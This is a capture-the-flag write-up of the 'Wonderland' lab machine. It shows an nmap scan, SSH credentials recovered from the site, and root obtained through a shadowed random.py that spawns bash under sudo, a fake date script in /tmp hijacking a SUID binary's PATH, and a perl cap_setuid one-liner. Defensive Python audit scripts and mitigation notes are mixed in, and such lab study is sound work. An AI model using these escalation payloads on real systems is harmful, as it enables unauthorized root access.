Wonderland

The room starts by handing us an IP address, so the first step is an nmap scan:

```
┌──(kali㉿kali)-[~/Desktop/WEBTOOL]
└─$ sudo nmap -sV -vv --script vuln 10.10.255.228
[sudo] kali 的密码:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-14 03:36 EDT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:36
Completed NSE at 03:37, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:37
Completed NSE at 03:37, 0.00s elapsed
Initiating Ping Scan at 03:37
Scanning 10.10.255.228 [4 ports]
Completed Ping Scan at 03:37, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:37
Completed Parallel DNS resolution of 1 host. at 03:37, 0.03s elapsed
Initiating SYN Stealth Scan at 03:37
Scanning 10.10.255.228 [1000 ports]
Discovered open port 80/tcp on 10.10.255.228
Discovered open port 22/tcp on 10.10.255.228
Completed SYN Stealth Scan at 03:37, 4.07s elapsed (1000 total ports)
Initiating Service scan at 03:37
Scanning 2 services on 10.10.255.228
Completed Service scan at 03:37, 13.62s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.255.228.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:37
NSE Timing: About 98.52% done; ETC: 03:37 (0:00:00 remaining)
NSE Timing: About 98.52% done; ETC: 03:38 (0:00:01 remaining)
NSE Timing: About 98.52% done; ETC: 03:38 (0:00:01 remaining)
NSE Timing: About 98.52% done; ETC: 03:39 (0:00:02 remaining)
NSE Timing: About 98.52% done; ETC: 03:39 (0:00:02 remaining)
NSE Timing: About 98.52% done; ETC: 03:40 (0:00:03 remaining)
NSE Timing: About 98.52% done; ETC: 03:40 (0:00:03 remaining)
NSE Timing: About 98.52% done; ETC: 03:41 (0:00:04 remaining)
NSE Timing: About 98.52% done; ETC: 03:41 (0:00:04 remaining)
NSE Timing: About 98.52% done; ETC: 03:42 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:42 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:43 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:43 (0:00:06 remaining)
NSE Timing: About 98.52% done; ETC: 03:44 (0:00:06 remaining)
NSE Timing: About 98.52% done; ETC: 03:44 (0:00:07 remaining)
NSE Timing: About 98.52% done; ETC: 03:45 (0:00:07 remaining)
NSE Timing: About 98.89% done; ETC: 03:45 (0:00:06 remaining)
NSE Timing: About 99.63% done; ETC: 03:46 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:46 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:47 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:47 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:48 (0:00:02 remaining)
Completed NSE at 03:48, 661.47s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 1.21s elapsed
Nmap scan report for 10.10.255.228
Host is up, received reset ttl 60 (0.29s latency).
Scanned at 2023-07-14 03:37:02 EDT for 680s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19   *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97   *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0   *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283   *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       EDB-ID:45233    5.0     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       CVE-2021-41617  4.4     https://vulners.com/cve/CVE-2021-41617
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        0.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp open  http    syn-ack ttl 60 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-enum:
|   /r/: Potentially interesting folder
|_  /img/: Potentially interesting folder
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 691.65 seconds
           Raw packets sent: 1093 (48.068KB) | Rcvd: 1002 (40.088KB)
```

Ports 22 and 80 are open, and nothing directly exploitable turned up, so I went on to enumerate the web service on port 80.

Visiting the corresponding page:

This revealed alice:HowDothTheLittleCrocodileImproveHisShiningTail, which I took to be an SSH username and password.

The current directory contains root.txt and walrus_and_the_carpenter.py.

I then tried to locate user.txt directly with find, but it could not be found, so I looked at the hint, which says:

It means everything is upside down: alice's home directory holds root.txt, so root's directory should correspondingly hold user.txt.

And that is indeed the case.

The second stage requires privilege escalation to read the contents of root.txt.

The Python file in the home directory has the following contents:

```python
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

# Print ten randomly chosen lines of the poem.
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```

At first glance there is no vulnerability here, but the `import random` can be abused: if a random.py exists in the current directory, Python imports it in preference to the standard library module, and that can be used to get a shell. Running the script as yourself gains nothing, of course, so I looked for SUID binaries or sudo rights that would turn this into an escalation.

First, SUID: search for files with the SUID bit set:

```bash
find / -perm -u=s -type f 2>/dev/null
```

Then check `sudo -l`:

This shows that Python can be run with sudo, so writing a random.py is enough to escalate to the rabbit user:

```python
import os
os.system('/bin/bash')
```
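The weakness exploited here is that Python puts the script's own directory at the front of `sys.path`, so any module name the script imports can be shadowed by a file sitting next to it. The audit below, an added example that is not part of the room or this writeup, resolves a module name the way the import system would, without executing anything, and flags a standard-library name that resolves outside the interpreter's stdlib directory. The shadow module it builds in a temporary directory for the demonstration is constructed and harmless.

```python
"""Audit where a Python module name resolves from on a given search path."""
import os
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder

# Directory holding the standard library of the running interpreter.
STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def resolve_module(name, search_path=None):
    """Return the file a module would be loaded from, or None if not found.

    PathFinder.find_spec walks the path list in order, exactly like a normal
    import, but it neither consults sys.modules nor runs any module code.
    """
    path = sys.path if search_path is None else search_path
    spec = PathFinder.find_spec(name, path)
    if spec is None or spec.origin is None:
        return None
    return os.path.realpath(spec.origin)


def is_shadowed(name, search_path=None):
    """True when a standard-library name resolves to a file outside STDLIB_DIR."""
    origin = resolve_module(name, search_path)
    if origin is None:
        return False
    return not origin.startswith(STDLIB_DIR + os.sep)


def audit(names, search_path=None):
    """Map each module name to (origin, shadowed) for a short report."""
    return {n: (resolve_module(n, search_path), is_shadowed(n, search_path))
            for n in names}


def demo():
    """Constructed scenario: a directory holding a harmless random.py is put
    first on the search path, as a script's directory would be.
    Returns (shadowed on the clean path, shadowed with the rogue directory)."""
    clean = is_shadowed("random")
    with tempfile.TemporaryDirectory() as rogue_dir:
        with open(os.path.join(rogue_dir, "random.py"), "w") as f:
            f.write("# constructed shadow module for the demo; defines nothing\n")
        poisoned = is_shadowed("random", [rogue_dir] + sys.path)
    return clean, poisoned


if __name__ == "__main__":
    for name, (origin, bad) in audit(["random", "os", "json"]).items():
        print(f"{name:8s} {'SHADOWED' if bad else 'ok':8s} {origin}")
    print("demo (clean, poisoned):", demo())
```

On the mitigation side, running scripts with `python3 -I` (isolated mode, which drops the script directory and user site-packages from `sys.path` and ignores `PYTHON*` environment variables; `-P` alone does the former on 3.11+) closes this hole, and a sudoers rule that grants an interpreter rather than a fixed, root-owned script is the root cause worth fixing.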

After running it, I got a shell as rabbit.

In rabbit's home directory I found a binary with the SUID bit set, so I suspected this file could be used for escalation.

Looking carefully at its output, there is a timestamp that differs on every run, which suggested it might be calling a system command. I ran date myself and got the same format, so I guessed the binary calls the date command.

And because a SUID binary runs with elevated privileges but still reads the environment variables of the user who launched it, the environment can be manipulated to make it run a custom shell script and escalate privileges.

The procedure: PATH is searched from left to right, so with a PATH such as /tmp:/usr/bin, if a date exists in /tmp and one also exists in /usr/bin, **the one in /tmp is executed**.

So all that is needed is a custom shell script named date in /tmp.

The contents of date:

```bash
#! /bin/bash
/bin/bash
```
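The same left-to-right PATH search can be turned into a check. The audit below is an added example, not code from the room or this writeup: it resolves a command the way a POSIX shell does and reports every PATH directory searched up to and including the winner that a non-root user could write to, which is exactly the condition that lets a privileged program calling `date` by bare name be hijacked. The `date` stubs and directories in `demo()` are constructed in a temporary directory and are never executed; the `dir_is_root_only` trust test is a plain ownership and permission check intended for real PATH entries.

```python
"""Check whether a command run by bare name can be hijacked through PATH."""
import os
import stat
import tempfile


def _is_executable_file(path):
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & 0o111)


def resolve_command(cmd, path_value):
    """Return the file that would run for cmd, searching like a POSIX shell.

    A name containing a slash is never searched on PATH; an empty PATH entry
    means the current directory (a classic trap)."""
    if os.sep in cmd:
        return cmd if _is_executable_file(cmd) else None
    for entry in path_value.split(os.pathsep):
        candidate = os.path.join(entry or ".", cmd)
        if _is_executable_file(candidate):
            return candidate
    return None


def dir_is_root_only(directory):
    """Real-filesystem trust test: root-owned and not group/world writable."""
    try:
        st = os.stat(directory)
    except OSError:
        return False
    return st.st_uid == 0 and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def hijack_risk(cmd, path_value, is_trusted_dir=dir_is_root_only):
    """Return (resolved_path, untrusted_dirs_searched).

    The command is hijackable if any directory searched before the match is
    untrusted (someone could plant cmd there) or the match itself lives in
    an untrusted directory."""
    resolved = resolve_command(cmd, path_value)
    untrusted = []
    if os.sep in cmd:
        return resolved, untrusted
    for entry in path_value.split(os.pathsep):
        entry = entry or "."
        if not is_trusted_dir(entry):
            untrusted.append(entry)
        if resolved is not None and os.path.join(entry, cmd) == resolved:
            break
    return resolved, untrusted


def demo():
    """Constructed scenario: a user-writable directory and a stand-in system
    directory each hold an executable named date.
    Returns (hijacked with the inherited PATH, safe with a fixed PATH)."""
    with tempfile.TemporaryDirectory() as writable, tempfile.TemporaryDirectory() as system:
        for d in (writable, system):
            stub = os.path.join(d, "date")
            with open(stub, "w") as f:
                f.write("#!/bin/sh\necho stub\n")  # constructed stand-in, never executed
            os.chmod(stub, 0o755)
        trusted = lambda d: d == system  # stands in for dir_is_root_only here
        # inherited PATH with the writable directory first, as in the writeup
        resolved, bad = hijack_risk("date", os.pathsep.join([writable, system]), trusted)
        hijacked = resolved == os.path.join(writable, "date") and bad == [writable]
        # hardened: the privileged program resets PATH to system directories only
        resolved2, bad2 = hijack_risk("date", system, trusted)
        safe = resolved2 == os.path.join(system, "date") and bad2 == []
    return hijacked, safe


if __name__ == "__main__":
    print("demo (hijacked, safe):", demo())
    print("real PATH:", hijack_risk("date", os.environ.get("PATH", "")))
```

From an unprivileged shell, `hijack_risk("date", os.environ["PATH"])` shows whether the inherited PATH would let that user influence what a privileged caller runs; on the binary side the fix is to invoke commands by absolute path or reset PATH to a fixed value before calling `system()`.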

The escalation worked. At this point I honestly did not know how to continue.

I also tried SUID again, but it did not help.

This step actually uses capabilities for escalation:

```bash
getcap -r / 2>/dev/null
```
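Reviewing `getcap -r` output by eye is error-prone, and the output format changed between libcap releases (`/path = cap_x+ep` in older versions, `/path cap_x=ep` in newer ones). The parser below is an added example, not code from the room or this writeup: it reads both formats, resolves the `+`/`=`/`-` clause operators, and lists binaries whose permitted set contains a capability that can lead to root or bypass file permissions. The sample output is constructed for the demo; the perl line mirrors the `cap_setuid` the writeup's final step depends on, the other paths are made up.

```python
"""Parse getcap -r output and flag capabilities that amount to root."""
import re
import sys

# Capabilities that let a process become root or bypass DAC outright.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

# One clause: comma-separated cap names, an operator, then e/i/p flags.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")

# Constructed sample in both libcap output styles (not real scan output).
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tools/netdump cap_net_admin,cap_net_raw=eip
"""


def parse_capstring(text):
    """Turn 'cap_a,cap_b+ep cap_c=i' into {'cap_a': 'ep', 'cap_b': 'ep', 'cap_c': 'i'}."""
    caps = {}
    for clause in text.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names, op, flags = m.groups()
        for name in names.split(","):
            current = set(caps.get(name, ""))
            if op == "=":
                current = set(flags)          # replace the flag set
            elif op == "+":
                current |= set(flags)         # add flags
            else:
                current -= set(flags)         # '-' removes flags
            caps[name] = "".join(sorted(current))
    return caps


def parse_getcap(output):
    """Return [(path, {cap: flags})] for each non-empty line of getcap output.

    Paths containing spaces are not handled; getcap prints them unquoted."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.strip()
        if rest.startswith("="):              # older '/path = caps' style
            rest = rest[1:].strip()
        entries.append((path, parse_capstring(rest)))
    return entries


def find_dangerous(entries):
    """List (path, cap, flags) where a dangerous cap is in the permitted set."""
    hits = []
    for path, caps in entries:
        for name, flags in sorted(caps.items()):
            if name in DANGEROUS_CAPS and "p" in flags:
                hits.append((path, name, flags))
    return hits


if __name__ == "__main__":
    # Pipe real output in:  getcap -r / 2>/dev/null | python3 this_script.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP_OUTPUT
    for path, cap, flags in find_dangerous(parse_getcap(text)):
        print(f"DANGEROUS {path}: {cap}={flags}")
```

A hit for an interpreter such as perl or python deserves the same scrutiny as a SUID copy of that interpreter: anyone who can run it can call `setuid(0)`, so the capability should be removed (`setcap -r`) or confined to a dedicated, non-interactive helper.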

One thing to note: I found that if you reach the hatter user by escalating from another user, you cannot use the capability bit to escalate further, because that process has not inherited hatter's capabilities; you have to get in via SSH or some other means. I then found hatter's password in hatter's home directory.

```bash
hatter@wonderland:/home/hatter$ cat /home/hatter/password.txt 
WhyIsARavenLikeAWritingDesk?
```

So I logged in over SSH with that password and then escalated with `perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'`.

That gave me a root shell.